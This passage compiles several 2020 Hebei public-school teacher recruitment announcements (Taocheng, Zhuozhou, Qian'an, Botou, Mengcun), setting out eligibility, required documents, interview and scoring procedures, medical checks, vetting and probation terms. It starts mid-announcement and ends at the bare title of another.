衡水市户籍往届未就业的符合“先上岗、再考证”阶段性措施要求的全日制普通高校毕业生持以下证明材料:(1)有效期内的二代居民身份证;(2)毕业证、就业报到证;(3)户口簿(包括首页和本人页)或户口迁移证等相关证明材料;(4)已经取得教师资格证或考试通过暂未发证的,提供教师资格证或相关教师资格认定机构出具各项成绩考试合格的证明。未取得的不必提供;(5)报考服务基层项目计划岗位的人员按管理权限持相关部门颁发的服务期满合格证;(6)其他证明材料;以上材料均需提供原件和复印件(A4纸)一份。
衡水市户籍往届不符合“先上岗、再考证”阶段性措施要求的全日制普通高校毕业生持以下证明材料:(1)有效期内的二代居民身份证;(2)毕业证;(3)户口簿(包括首页和本人页)或户口迁移证等相关证明材料;(4)教师资格证或相关教师资格认定机构出具各项成绩考试合格的证明;(5)报考人员已在企业就业的按人事管理权限由相关部门出具相关证明及同意报考的意见,未就业的不必提供;(6)报考服务基层项目计划岗位的人员按管理权限持相关部门颁发的服务期满合格证;(7)其他证明材料;以上材料均需提供原件和复印件(A4纸)一份。
以上各类人员如果已在人才交流中心办理了人事代理,则需另外再提供人事代理协议,不得再提供报到证。
对报考比例较低的岗位将在报名结束后立即进行资格复审,复审不合格者取消资格,因复审不合格达不到开考比例的人员和岗位将即时调整。
资格复审的时间、地点和其他要求请随时关注网站。不能按要求提供有效证明材料的,视同放弃资格。对资格复审过程中出现不合格人员或放弃资格的,其空缺岗位按报考该岗位考生笔试成绩从高分到低分的顺序依次递补。对伪造、编造有关证件、材料、信息等,骗取考试资格的,将按有关规定予以严肃处理。
2.面试形式及内容。面试采取说课方式进行(要求不使用多媒体设备),说课时间控制在10分钟以内,说课课题选定采用考生临场抽签的形式。面试内容为桃城区现行中小学、幼儿园、中等职业学校相应学科教育教材。
面试根据考生人数、面试时限合理分组,报考同一个岗位的考生一般分在同一面试组和面试场次。因招聘人数较多无法分在同组、同场的岗位,根据笔试总成绩的排名顺序(笔试总成绩相同的按电脑自动生成顺序排列),采取蛇型分组法分组,并将招聘计划合理均分到每个面试小组,综合考试成绩按照面试小组排序,并按面试分组的招聘计划确定。
3.面试成绩。面试成绩满分为100分,按40%权重计入总分。面试成绩采用“体操打分”方法,去掉一个最高分和一个最低分,其他分数的平均分为面试成绩。
请考生及时关注公告,按要求在桃城区事业单位招聘考试网“面试通知单”专栏自行打印《面试通知单》。面试时间、地点、注意事项等内容详见《面试通知单》。
考生须持有效期内的二代居民身份证、笔试准考证、面试通知单、《新冠肺炎疫情防控诚信承诺书》参加面试。每场面试前,考生抽签决定面试顺序。考生抽签结束仍未到者视为放弃资格。面试时考生只报自己的组别和抽签号,不得报姓名等其他个人信息。考生面试结束后立即离开考场,不得返回面试室、候考室,不得在考场附近逗留、议论。对于违反面试纪律和规定的考生,取消面试资格或面试成绩。
4.总成绩。面试结束后,按笔试成绩、面试成绩所占比例合成总成绩,按照四舍五入原则,保留至小数点后两位。
5.确定进入体检、考察政审人员名单。根据总成绩,按从高分到低分的原则,确定进入体检、考察政审人员。比例内末位考生综合成绩如出现并列,按以下顺序确定进入体检考生:大学生退役士兵,烈士子女或配偶,有新冠疫情防控一线工作经历的城乡社区工作者,面试成绩高者,学历较高者,专业对口者。如有放弃进入体检资格者按总成绩依次递补。
九、体检、考察政审、公示
体检参照现行的《公务员录用体检通用标准》执行,体检费用由参加体检人员负担。如出现体检不合格者则按从高分到低分原则依次递补,递补原则同由面试环节进入体检、考察政审环节递补原则。
体检合格的考生,确定为考察政审对象,由用人单位及其主管部门组织考察政审。考察工作重点考察政治素质、道德品行、能力素质、学习和工作表现、遵纪守法、廉洁自律等方面的情况。政审要重点了解考生的政治信仰、政治立场、政治意识和政治表现,本人的政治历史及其直系亲属和主要社会关系的情况,在重大历史事件中的主要表现等。考察政审不合格者,由主管部门及相关单位提出取消聘用资格的意见,报领导小组审核。
考察政审合格人员作为拟聘用人选公示7个工作日。对公示反映有问题并查有实据,不符合聘用条件的取消拟聘资格,按总成绩从高分到低分依次递补,递补原则同上。公示期满无异议或有异议但经核实不影响聘用的,按照有关规定办理聘用相关手续。试用期为一年。聘用考生在所聘单位工作年限不少于3年,在桃城区教育系统工作年限不少于5年。
本次招聘的政策、方法、程序、时间地点安排、有关要求等,已在本公告中尽可能详细写明,请认真阅读,在确有公告未尽的疑问时再电话咨询,以提高广大考生的咨询效率。
特别提醒:应聘人员应保证联系电话畅通,及时关注网站。凡考生未在规定时间内按要求参加笔试、证件审核、面试、体检、考察政审、报到等情况的,均视为自动放弃应聘资格;资格审核贯穿招聘工作全过程,任何环节,发现考生填报不实、提供虚假材料等情况,即取消资格,并记入不良记录名单,问题严重的依法依纪依规追究责任。
咨询电话:0318—6982986
监督电话:18603189627
详情登录
http://www.taocheng.gov.cn/art/2020/8/6/art_973_252903.html
涿州市技师学院公开选用政府购买服务教师公告
根据《河北省事业单位公开招聘工作人员暂行办法》和《保定市事业单位公开招聘工作人员暂行办法》,为尽快解决涿州市技师学院教师师资短缺问题,面向社会公开选用技师学院政府购买服务教师13名。为确保选用工作顺利进行,特制定本公告。
一、选用方式和原则
(一)本次选用采取面试与考核相结合的方式进行。
(二)坚持面向社会公开选用。
(三)坚持德才兼备和公平、公正、公开、竞争、择优的原则。
二、选用单位、岗位、名额及岗位所需具体条件见《涿州市技师学院2020年公开选用政府购买服务教师岗位信息表》,同时符合下列基本条件:
(一)具有中华人民共和国国籍;
(二)遵守宪法和法律;
(三)具有良好的品行和职业道德;
(四)年龄在18周岁至35周岁(2002年8月11日以前出生、1984年8月13日以后出生),研究生及以上学历的考生,年龄可放宽到40周岁(2002年8月11日以前出生、1979年8月13日以后出生),具备研究生及以上学历的考生须在两年内取得符合岗位信息表要求的教师资格证书,否则予以辞退。
(五)应届高校毕业生和择业期内未落实工作单位的高校毕业生,凡符合教师资格考试报名条件和教师资格认定关于思想政治素质、普通话水平、身体条件等要求的,可以先上岗从事教育教学相关工作,再参加考试并取得教师资格。先上岗的高校毕业生试用期为1年,在试用期内未取得相应教师资格的,学院将依法解除其聘用合同。
(六)适应岗位要求的身体条件;
(七)具备岗位所需要的其他条件。
(八)下列人员不得报考:
受到党纪政纪处分期限未满的、正在接受调查的、曾因犯罪受过刑事处罚的、曾被开除公职的、法律法规规定不得选用为教师其它情形的。
三、发布选用公告
公告网址:河北人才网(www.hbrc.com.cn)“公告通知”栏。
四、报名与资格审查
本次选用采用现场报名、现场资格审查的方式,报名时带毕业证、教师资格证(教师资格考试通过未取得教师资格证书者,提供教师资格考试合格证、有相关要求的必须当场签订两年内取得教师资格证的协议)、报到证、有效身份证等相关证书的原件及复印件各一份,需填写报名登记表及应聘岗位,交近期同版免冠一寸照片3张。所提供材料必须真实,如有弄虚作假行为,一经查实,将取消考试或选用资格。
报名考务费每人100元,报名现场缴纳。
报名地点:涿州市技师学院综合楼一楼综合办公室,咨询电话:03123978110。
报名时间:2020年8月11日—2020年8月13日(共3天)
五、面试
1、面试时间为:2020年8月18日;地点:涿州市技师学院。
2、面试采取说课的方式分组进行,报考同一职位的考生一般分在同组面试,并实行入闱管理,面试时间6分钟,每人备课5分钟。面试时,考生只准报抽签顺序号,不得报姓名及个人信息,否则视为违纪并取消后续资格;说课内容在面试当天由主考官从报考岗位涉及专业现行教材中随机抽取。
3、面试成绩满分为100分。打分采取体操式打分法,即分别去掉一个最高分和一个最低分,其余评委的平均分为考生面试有效得分。其中,面试成绩最低分数线为60分,低于60分者取消后续资格;面试结束后,在面试地点公布面试成绩。
六、体检
根据考生面试成绩,从高分到低分分岗位按照1:1的比例确定进入体检程序人员,体检参照公务员体检标准执行,体检费用由考生直接交体检医院。分数相同时优先进入体检程序的顺序为:有教师资格证书者、学历高者、持有职称资格证或职业资格证书及技能比赛奖励证书者、取得证书时间早、年龄小者优先。
七、考核
1、考核由涿州市技师学院组织实施。对通过面试且体检合格人员的政治思想表现、道德品质、业务能力、工作实绩等进行全面考察,并做出合格与否的结论。其中,考核结果为不合格者要详细说明原因。考生自接到考核通知起在规定时间内应按用人单位要求提供人事档案及毕业证、报到证、身份证、相关证明材料的原件。无故不能提供上述资料或无正当理由逾期不予提供的,视为自动放弃。
2、考核期间自动放弃及考核不合格的,取消选用资格,所空出的岗位依据总成绩由高到低的顺序依次进行递补,成绩并列时,递补的顺序同优先进入体检的顺序。
3、涿州市技师学院要本着客观公正、实事求是、认真负责的原则,在规定的时间内完成考核等相关工作,不得私设考核标准、不得弄虚作假或配合弄虚作假、不得无故拖延考核时间而影响选用工作进程。
八、公示
1、依据各选用岗位的考试成绩及体检、考核结果,确定选用人员并在报名网站上公示7个工作日,公示期满后由涿州市技师学院负责通知选用人员上岗。
2、公示期间有人举报并经查实影响选用的取消其资格,由此而出现的岗位空缺不予递补。
九、选用人员待遇与管理
本次选用政府购买服务教师不纳入编制管理,对公示无异议人员,由技师学院与被选用人员签订劳动合同,实行试用期制度,试用期为6个月,试用期包括在合同期内。试用期满考核合格者正式签订劳动合同,不合格者取消选用资格。工资福利待遇参照在编教师标准执行,并按规定缴纳企业“五险一金”,职称申报、岗位设置、聘用、考核、奖励、培训等日常管理工作由技师学院负责,人社部门负责办理审批或备案手续,所需资金由市财政负责保障。
十、其他相关事宜
(一)选用工作在纪检监察部门的监督下进行,欢迎社会各界监督,以确保公开、公平、公正。
(二)相关人员要认真执行回避等有关规定,构成回避情形时,要自觉、主动回避。
(三)本次考试不指定考试辅导用书,不举办也不委托任何机构或个人举办考试辅导培训班。
十一、未尽事宜,按照《保定市事业单位公开招聘工作人员暂行办法》执行。
详情登录
https://www.hbrc.com.cn/Article/content/id/55365/code/bbbb.html
迁安市富民劳务派遣有限责任公司关于公开招聘教育系统劳务派遣工的公告
为加强教育系统工作力量,根据《劳动合同法》《劳务派遣暂行条例》,面向社会公开招聘劳务派遣职工。现公告如下:
一、招聘原则和方式
坚持德才兼备和民主、公开、竞争、择优的原则,在考试、考核的基础上择优聘用。
二、招聘岗位
共招聘256人。招聘岗位为迁安市所属公办学校中小学语文、数学、英语、音乐、体育、美术教师,中学政治、历史、地理、物理、化学、生物教师。各岗位招聘数量见附表。
劳务派遣选聘岗位出现空缺时,岗位空额划拨到招聘相应岗位。
三、招聘条件
(一)遵守宪法和法律,具有良好的品行和职业道德。
(二)具有适应岗位要求的身体条件。
(三)年龄在35周岁以下(1984年8月7日之后出生)。
(四)学历条件:师范类专业全日制本科毕业生;硕士研究生及以上学历毕业生。师范类专业以报到证作为界定标准。
(五)具有唐山市户籍(户籍以2020年8月7日户口所在地为准);全日制硕士研究生及以上学历人员、全日制普通类高等院校2020年毕业生不限户籍。
(六)有下列情形之一者,不得报名:
1.正在接受司法或纪检监察机关立案调查的;
2.受过司法机关刑事处罚的;
3.曾经被开除的公职人员;
4.全日制普通类2020年以后毕业的在读学生;
5.现役军人;
6.具有法律规定不得录用为教师的其他情形的人员。
四、管理方式和待遇
(一)劳务派遣职工与迁安市富民劳务派遣有限责任公司签订劳动合同。在劳动合同期内,由迁安市富民劳务派遣有限责任公司、迁安市教育局、学校三方进行日常管理、监督考核。考核不合格者,教育部门有权将其退回迁安市富民劳务派遣有限责任公司,并由迁安市富民劳务派遣有限责任公司解除劳动合同。劳动合同期满,劳动合同自行终止;或根据用工需求续签劳动合同。
(二)劳务派遣职工享受全额事业编制教师职称评聘及相应工资待遇,参加企业职工保险。
五、招聘程序
(一)发布公告
2020年8月7日通过迁安市富民劳务派遣有限责任公司微信公众号面向社会公开发布信息。
(二)报名和资格审核
2020年8月10日至12日(上午8:30至11:30,下午14:30至17:00),在迁安市第四实验小学报名。
本次招聘采取现场报名,不接收其他方式报名,每人限报一个岗位。
资格审核。本人带《报名表》(自行从网上下载,填全信息并打印,签名手写)及身份证、户口本、毕业证、报到证原件和复印件现场报名。同时,要提供《教育部学历证书电子注册备案表》(学信网自行打印)、U盘拷贝与报名表同版近期免冠电子证件照片(JPG格式、2寸、白色背景、深色衣服,照片用本人身份证号命名)和报名表电子版;留学回国人员和其他海外、外国学历学位获得者需取得国家教育部或省级教育行政部门出具的学历认证报告。报名时审查原件,留存复印件。
资格审核合格的考生,交纳报名考务费100元,只接受现金支付。
在迁安市富民劳务派遣有限责任公司微信公众号公示报名结果及领取准考证相关事宜。
开考比例:报考人数与招聘人数的比例不低于2:1,对达不到比例的岗位,减少该岗位招聘人数或取消该岗位的招聘计划,相应招聘计划调剂到语文、数学、英语学科。
(三)考试
考试委托第三方组织实施,采取笔试闭卷考试的方式,考试时间为120分钟,满分100分。
1.考试内容
(1)公共基础知识(10分):测试内容为国家教育法律、法规及职业道德等,主要包括:《教育法》《义务教育法》《教师法》《中小学教师职业道德规范》。
(2)专业知识(90分):测试内容为报考岗位学科高中现行教材知识。
2.成绩公示。在迁安市富民劳务派遣有限责任公司微信公众号公示考试成绩。
(四)体检
1.笔试成绩公示后,按照招聘人数与体检人数1:1的比例,依据考试成绩从高分到低分确定体检人选。体检项目和标准参照《公务员录用体检通用标准(试行)》执行。体检费用自理。
2.体检时间:具体体检时间、体检人员名单、集合地点、有关要求、体检结果等有关事项在迁安市富民劳务派遣有限责任公司微信公众号公布。
(五)审核
体检结束,由迁安市富民劳务派遣有限责任公司对体检合格人员进行审核,审核内容包括审核本人档案、违法违纪情况等。
(六)聘用
对体检和审核合格人员通过迁安市富民劳务派遣有限责任公司微信公众号进行公示,不少于5个工作日。经公示无异议的予以聘用,与迁安市富民劳务派遣有限责任公司签订劳动合同,合同期限为3年,试用期6个月。在2021年9月1日前没有符合岗位要求教师资格证的,劳动合同自动终止。
考生按照笔试成绩从高分到低分依次选定岗位(笔试成绩相同的抽签确定选岗顺序)。
六、相关事宜
(一)报考人员在规定时间未参加规定程序的,均视为自动放弃。
(二)因体检或审核不合格、公示结果影响聘用、公示期间放弃、个人原因导致无法按时签订劳动合同致使拟招聘岗位出现空缺的,在本岗位内按考试成绩由高分到低分依次递补。
(三)末位考试成绩并列的,按以下顺序确定体检人员:烈士子女或配偶,学历(学位)较高者,退役士兵,少数民族考生(末位成绩并列的请提供材料原件和复印件)。
(四)本次考试不指定考试辅导用书,不举办也不委托任何机构或个人举办考试辅导培训班。
(五)资格审查工作贯穿整个招聘过程,在任何环节,发现考生不符合招聘条件,弄虚作假或违反考试录用纪律的,一律取消考试或录用资格,问题严重的要追究当事人相关责任。
七、本公告解释权归迁安市富民劳务派遣有限责任公司。
咨询电话:0315-7639217 0315-5215515
详情登录
https://mp.weixin.qq.com/s/mmz-kXnuM9hqAY8SaZhVMw
2020年泊头市公开招聘合同制教师公告
经市政府批准,公开招聘合同制教师229名(中小学教师190名,幼儿教师20名,第二中学教师19名)。
一、招聘原则
坚持“公开、平等、竞争、择优”的原则,按照德才兼备的用人标准和岗位所需专业、条件,采取公开招聘的方式,择优聘用。
二、招聘条件
(一)具有泊头市辖区户籍、泊头市辖区生源地、夫妻一方为泊头市辖区户籍、父母(夫妻双方父母)有其一为泊头市户籍,以上四种情况必备其一(第二中学不限户籍)。
(二)遵守宪法和法律。
(三)报考农村偏远学校年龄在35周岁以下(1985年8月1日以后出生)。其他岗位年龄在30周岁以下(1990年8月1日以后出生)。研究生学历年龄放宽到35周岁以下(1985年8月1日以后出生),身体健康。(农村偏远学校包括西辛店学区、富镇学区、四营学区、郝村学区、营子学区、齐桥学区菜园小学、第五中学、营子中学)。
(四)毕业证和教师资格证有关要求
(1)报考高中教师岗位需有全日制本科学历;报考初中教师岗位需有本科学历(全日制专科以上起点);报考小学和幼儿园教师岗位需有全日制专科及以上学历。
(2)按照人力资源社会保障部、教育部等七部委《关于应对新冠肺炎疫情影响实施部分职业资格“先上岗、再考证”阶段性措施的通知》(人社部发【2020】24号)凡符合报名条件的2020届高校毕业生以及2018、2019届尚未落实工作单位的高校毕业生,可以先报考教师,录取上岗后再考证,在1年试用期内,未取得岗位要求教师资格证的,依规解除聘用合同。除此之外符合报名条件的考生,报考时必须持有教师资格证,根据《岗位信息表》的要求进行报考。
(五)拟报名人员有本公告第八项所列情况之一者不允许报名。
三、岗位设定和要求
1、今年招聘教师全部定岗到学校、学科,每个考生限报一个岗位。
2、每个岗位报名人数和招聘计划原则上不低于2:1,岗位报名人数达不到2:1的,笔试成绩必须达到本学段、学科平均成绩及以上。无人报考的岗位由招聘领导小组统筹安排。
3、历史、地理、政治等专业报名人数不足时,将空余岗位计划调整到中学语文学科;生物、物理、化学等专业报名人数不足时,将空余岗位计划调整到中学数学学科。
4、毕业证专业或教师资格证专业必须有其一与所报专业(学科)一致或相近。没有教师资格证并且毕业专业和所报专业不一致的,全日制本科及以上可报中小学语文、数学、英语岗位;非全日制本科只能报考小学语文、数学、英语岗位或农村中学的语文、数学、英语岗位;全日制专科只能报考小学语文、数学、英语岗位。
5、各学段报考学科:
幼儿报考专业为学前教育或幼儿教育。
小学报考学科分别为小学语文、小学数学、小学英语、小学音乐、小学体育、小学美术、小学信息技术、特殊教育专业。
初中报考学科分别为初中语文、初中数学、初中英语、初中物理、初中化学、初中政治、初中历史、初中音乐、初中体育、初中美术、初中信息技术。
高中报考学科分别为高中语文、高中数学、高中英语、高中生物、高中历史、高中地理、高中政治、高中体育、高中美术。
四、招聘岗位(见附件)
五、招聘信息发布
2020年8月7日至2020年8月13日在泊头市电视台、泊头市人民政府网站发布招聘信息。
六、招聘报名
(一)报名方式:采取网上报名的方式。报名前完全了解本次招聘的政策和拟报考岗位条件,认真阅读《报名须知》并同意《诚信承诺书》,凡发现网上填报的信息与实际情况不一致的取消报名资格。
(1)网上报名时须使用有效的第二代《居民身份证》,报名信息提交成功的,获取“报名号”和“初始密码”后才能登录报名系统,进行填表和提交审核。“报名号”和“密码(可修改)”是登录报名系统、查询资格初审结果、下载打印准考证等事项的唯一标识,请报考人员务必牢记并保管好。
(2)规范填写报名信息,上传的电子照片(近期白底证件照、不得美颜)要符合要求,否则将被报名系统自动拒绝。
(3)审核员一般24小时内完成初审,并通过网上报名系统反馈审核结果。“审核未通过”的,可根据提示的原因,修改填报信息并重新提交审核;“审核通过”的,填报信息将不能再修改。
(4)网上缴费。报名审核通过的考生及时使用支付宝网上缴纳报名费。超过缴费时间没有缴费成功的,视为放弃。
(5)网上报名的考生一定要及时关注审核信息,审核未通过的要及时查看原因,按照反馈信息进行修改,并再次提交审核。
考生按步骤进行具体操作,在报名期限内登录http://121.28.131.187:8041网,注册成功后登录网上报名系统进行报名,报名时按招聘岗位报名,每人只限填报一个岗位,报名时认真选择岗位代码,报名成功后自行打印报名表。
(二)报名时间:2020年8月 11日9:00至2020年8月15日17:00,缴费时间截止2020年8月16日17:00 。
(三)考生2020年8月21日9:00至8月22日17:30自行登录http://121.28.131.187:8041网打印笔试准考证。
咨询电话:0317-8185126;0317-8187123。
(四)入围面试考生查验核实证件包括:二代身份证、户口簿、毕业证、在学信网打印《教育部学历证书电子注册备案表》、就业报到证、教师资格证(符合暂不提供教师资格证的可暂不提供)、报名表。
(五)报名费用:按规定收取报名费、考务费100元/人(网上缴费)。
(六)泊头市公办教师(包括合同制教师)、泊头市事业单位试用期内工作人员不得报名,其它县市公职人员面试结束后需提交辞职证明和档案。
七、考试
为落实疫情防控要求,所有考生需提前测量日常体温,监测身体健康状况,自公告发布之日起进行健康申报。考生通过微信搜索“冀时办”下载“河北健康码”,如实填写个人信息,打卡上报每日体温。待考生进入笔试、资格审查、面试时,需佩戴口罩,出示“河北健康码”,并接收体温检测,正常者方可进入考场。持非绿码的考生,须提供笔试、资格审查、面试前核酸检测证明。无法提供健康证明的,不能参加相应的考试审查(按考试时疫情防控要求为标准)。
(一)笔试
报名合格人员参加全市组织的统一考试,考试采用闭卷的方式。
1、幼儿教师岗位考试内容为教师职业道德修养、学前卫生学、学前教育学、学前心理学、学前教育活动设计与指导。
2、中小学教师岗位语文、数学、英语考试内容为:专业基础知识和教育公共基础知识,专业基础知识为高中、初中所学本学科知识,教育公共基础知识为教育学、教育心理学、中小学教师职业道德修养基本知识;报考中学历史、地理、政治三科的考试内容与中小学语文学科一致,报考中学物理、化学、生物三科的考试内容与中小学数学学科一致;中小学其它专业和特教专业考试科目均为教育公共基础知识(教育学、教育心理学、中小学教师职业道德修养基本知识)。
3、考试不指定辅导用书和辅导机构,卷面满分均为100分,考试时间均为120分钟。
(二)资格审查
笔试结束后按 2:1的比例,按报考岗位笔试成绩由高分到低分的顺序确定参加面试人员,比例内末位笔试成绩并列的都进入面试,达不到2:1比例的按照第三项第2条执行。同时,招聘领导小组对进入面试的人员进行资格审查,对审查不合格人员取消招聘资格,如在招聘过程中任何一环节发现报名人员提供虚假资料或有不符合报名条件的,取消其招聘资格,报名费用不再退还。
(三)面试
面试岗位形不成竞争时,设置合格分数线。
1、幼儿教师岗位面试(100分)
面试分为:讲课(50分)和基本技能测试(50分)两部分。
(1)讲课:时间为5分钟。讲课选用幼儿中、大班教材。
(2)基本技能测试:
① 自弹自唱技能测试:自选一首歌曲、乐器自备(电子琴、手风琴)(30分)。
②舞蹈技能测试:自选舞蹈、自备伴奏U盘(20分)。
2、小学教师岗位面试(100分)
(1)语文、数学、英语、特教专业面试方式为讲课(100分);音、体、美、信息技术面试方式为讲课(50分),讲课内容为小学3-6年级教材内容,考生按所报岗位采取随机抽课的方式进行,讲课前抽签确定顺序(先抽顺序再抽课题),按顺序备课20分钟,然后进行讲课,讲课时间为5分钟。
(2)音、体、美、信息技术专业技能测试(50分)
①音乐专业:声乐(清唱)、器乐(自选一种、自带)、舞蹈(自备伴奏U盘),曲目自定,测试15分钟。
②信息技术专业:测试计算机软件操作,测试50分钟。
③美术专业:命题创作(画种不限,材料自备)。其中命题创作限幅长不超过60cm,宽不超过 40cm,测试50分钟。
④体育专业:测试体育教师示范动作等基本素质。
3、初中教师岗位面试(100分)
初中讲课内容为7—8年级教材,考生按所报岗位采取随机抽课的方式进行,讲课前抽签确定顺序(先抽顺序再抽课题),按顺序备课20分钟,然后进行讲课,讲课时间为5分钟。体育、美术、音乐、信息技术面试分为:讲课(50分)和专业技能测试(50分)两部分,专业技能测试与小学专业技能测试要求相同。
4、高中教师岗位面试(100分)
高中讲课内容为高一、高二教材。考生按所报岗位采取随机抽课的方式进行,讲课前抽签确定顺序(先抽顺序再抽课题),按顺序备课20分钟,然后进行讲课,讲课时间为5分钟。体育、美术面试分为讲课(50分)和专业技能测试(50分)两部分,专业技能测试与小学专业技能测试要求相同。
面试结束后,音、体、美、信息技术学科将笔试成绩乘以40%和面试成绩乘以60%相加按报考岗位由高分到低分排序(笔试成绩和面试成绩都保留两位小数),其它学科笔试成绩乘以50%和面试成绩乘以50%相加按报考岗位由高分到低分排序(笔试成绩和面试成绩都保留两位小数),按1:1的比例确定拟聘用人员。最后一名总成绩出现并列者按笔试成绩分高者录取。
八、考核
招聘领导小组负责对拟聘用人员档案材料进行审核,审核合格人员予以考核,考核主要考察拟聘人员的思想政治表现、道德品质、业务能力、工作实绩等情况。
九、体检
考察合格人员按规定时间和地点参加体检。体检项目、标准参照现行《公务员录用体检标准》中有关规定执行,体检费用自理,体检不合格或不按规定体检者,取消拟聘用资格。
十、公示
经考察、体检合格人员,确定为拟聘用人选。市人力资源和社会保障局、市教育体育局负责将拟聘用人选情况面向社会进行不少于7天的公示,接受社会和群众监督。
公示期间,对反映有严重问题并查有实据不符合聘用条件的或在公示期间放弃聘用的,取消其拟聘人选资格;对反映有严重问题但一时难以查实的,暂缓聘用,待查实并做出结论后决定是否聘用;对公示期满无异议或有反映问题但经核实不影响聘用的,可办理相关聘用手续。
监督电话:0317—8180599。
十一、调剂补录
此前各环节如出现招录岗位空缺时将发布调剂补录计划公告,参加面试且没被拟聘的考生同学科(中小学对应)进行网上公开报名,分别按总成绩从高到低依次选岗补录。
十二、聘用
被聘用人员实行试用期,试用期一年,试用期待遇按现行泊头市最低工资标准执行,试用期一并计算在聘用合同期限内(在一年试用期内,未取得岗位要求教师资格证的,依规解除聘用合同)。试用期满考核合格的,予以正式聘用,实行合同制管理,待出现空编后整体入编。档案由教体局归口管理。首次签订聘用合同期限为3年,聘用人员待遇参照在编教师待遇标准核定执行。试用期考核不合格的取消聘用。聘用后原则上农村偏远学校6年内不能调动,其他学校8年内不得申请调动。
十三、纪律与监督
在招聘工作中,严格执行各项政策规定,自觉接受社会和群众监督。同时,招聘工作的每个环节,都要由纪律监察组负责全程监督。
十四、组织机构
为加强对招聘教师工作的领导,确保招聘工作规范有序进行,成立泊头市教师招聘工作领导小组,负责招聘工作的组织和管理,并对招聘工作的公开、公平、公正、安全及保密负总责。领导小组下设办公室(设在人社局),负责公开招聘工作的协调指导,考试环节由教体局牵头负责。同时,成立泊头市教师招聘工作纪律监察组,对招聘工作进行全程监督。
十五、本方案未尽事宜,由泊头市教师招聘工作领导小组研究解决。本方案由泊头市教师招聘工作领导小组办公室负责解释。
详情登录
http://www.botou.gov.cn/article.asp?ID=24631
河北孟村回民中学2020年教师选聘实施方案
为切实做好河北孟村回民中学2020年公开选聘教师工作,结合我校实际,特制定本方案。
一、选聘原则
坚持德才兼备的用人标准,贯彻民主、公开、竞争、择优的原则。
二、选聘岗位及数量
语文5人、数学5人、英语5人、物理4人、化学3人、生物4人、历史4人、政治3人、地理4人、信息技术2人、体育1人。总共40人。
三、选聘对象和条件
(一)选聘对象
全日制普通类一本及以上学历毕业生,并获得学士及以上学位。
(二)应聘人员应具备以下基本条件
1.具有中华人民共和国国籍;
2.年龄限制:35周岁以下(1985年7月1日以后出生的);
3.具有相应资格的教师资格证。2018年、2019年、2020年毕业的考生可不具有教师资格证,但两年内必须取得相应的教师资格证;
4.遵守宪法和法律;
5.具有良好的品行和职业道德;
6.具有与选聘岗位要求相适应的年龄、学历学位条件;
7.具备适应岗位要求的身体条件;
8.具备岗位所需要的其他条件;
9.教学业绩特别突出,有丰富教育教学管理经验的,必须满足职称为中学高级教师,另外满足省市级学科带头人、省市级优秀班主任、省级以上优质课一等奖等条件之一的,作为我校急需的特殊人才,可放宽年龄在45周岁以下((1975年7月1日以后出生的)、学历可放宽到全日制专科参加选聘。
(三)有下列情形之一的人员不得报考:
1.因犯罪受过刑事处罚的、被开除公职的人员;
2.现役军人;
3.服务期未满的特岗教师及在编教师,在机关事业单位工作但未满规定的最低服务年限的;
4.法律、法规规定不得选聘为事业单位工作人员的其他情形人员。
四、选聘的程序和方法
本次公开选聘工作在孟村回民中学公开招聘工作领导小组统一领导下组织实施。本次选聘采取现场报名、面试、体检、考察相结合的方法进行。选聘公告、成绩、体检、考察、录取信息均在孟村县政府网发布。
(一)报名
1.报名时间:2020年8月6日至8月10日(上午8:30—12:00,下午14:30—17:00)。
2.报名地点:孟村回民中学北楼一楼东侧教学处。
联系电话:0317-6858202 15532778696。
3.考生须在规定的时间、地点进行报名,每位考生限报考一个岗位。报名需携带本人本科及以上学历证书、学位证书、身份证、就业报到证的原件及复印件各一份。
(二)面试
1.面试时间、地点:电话通知考生领取面试通知书,时间、地点 以面试通知书为准。
2.面试评委:聘用第三方专业评委。
3.面试成绩最低合格分数线为60分,低于60分的不予录取。
4.面试组织形式和方法
(1)面试形式:入围人员面试采取说课+现场提问的方式,面试小组设评委5人(1人兼任主评委),纪检监察员(由政府指派纪检人员担任)、计时员(兼职记分员),各组人员承担相应的面试任务。
(2)面试方法:说课15分钟,现场提问4分钟,说课、提问均在面试室内完成,不得延时。参加面试人员需携带身份证和毕业证。
(3)面试成绩评定:评委根据考生的面试情况,参照评分标准独立评分,每个评委给每个考生评分保留两位小数(第三位小数采取四舍五入),然后取五位评委评分的平均分,记分员在统分表上登记,评委、记分员、纪检人员签字确认。
(4)成绩公布:考生面试完成后,在工作人员的引领下进入成绩公布室,等待获知个人成绩。按各岗位面试成绩由高到低的顺序按1:1的比例确定体检人员,如果末位考生面试总成绩出现并列,按有无教师资格证、烈士子女或配偶、本科为“985”院校、本科为“211”院校、本科为省重点师范院校、学历较高、奖学金等级较高、中共党员、优秀学生干部顺序确定人选,如果以上条件均相同,一并确定进入体检。
五、体检:组织参加体检人员到指定地点体检。体检标准参照现行的《公务员录用体检通用标准》执行,体检费用自理。体检不合格考生或主动放弃体检的考生,取消其选聘资格。
体检时间、地点另行通知。
六、考察合资格复审:对体检合格人员进行全面考察,主要审核本人档案和相关证明资料。考察时还须进一步核实考察对象是否符合规定的选聘条件,确认其提交的信息和材料是否真实、准确。对因不符合选聘条件的、未完成体检或体检不合格的、未按时完成考察或考察不合格考生、被取消选聘资格及未按时报到而造成选聘岗位出现空缺的,按报考考生的面试成绩在最低合格分数线以上由高到低依次递补,如果递补末位考生成绩出现面试成绩并列者,按有无教师资格证、烈士子女或配偶、本科为“985”院校、本科为“211”院校、本科为省重点师范院校、学历较高、奖学金等级较高、中共党员、优秀学生干部顺序确定人选,递补仅限于一轮次。
七、聘用:对经体检、考察、资格复审合格的人员,确定为拟聘人选,在孟村县政府网公示,公示时间为7个工作日,公示期间,对反映有严重问题并查有实据的,不符合聘用条件的取消拟聘人选资格;对反映有问题但一时难以查实的,暂缓聘用,待查实并做出结论后决定是否聘用。对公示期满无异议的,按照有关规定(本次选聘为县聘,没有编制),办理相关聘用手续,签订聘用协议,工资待遇根据县聘教师相关规定标准及有关工资政策执行。被聘人员按规定实行试用期制,试用期一并计算在聘用合同期限内。没有教师资格证的需在两年内取得相应的教师资格证,否则予以解聘。
八、公示:孟村回民中学对签订聘用合同的人员予以公示。
此次被公开选聘的人员需在本单位服务满五年(含试用期)后方可流动;服务期未满擅自离职的,需缴纳聘用合同约定的违约金。
九、疫情防控工作由卫健局具体负责实施。
注:纪检人员参与选聘全过程。
详情登录
http://www.mengcun.gov.cn/plus/view.php?aid=8126
承德高新区2020年公开招聘教师公告
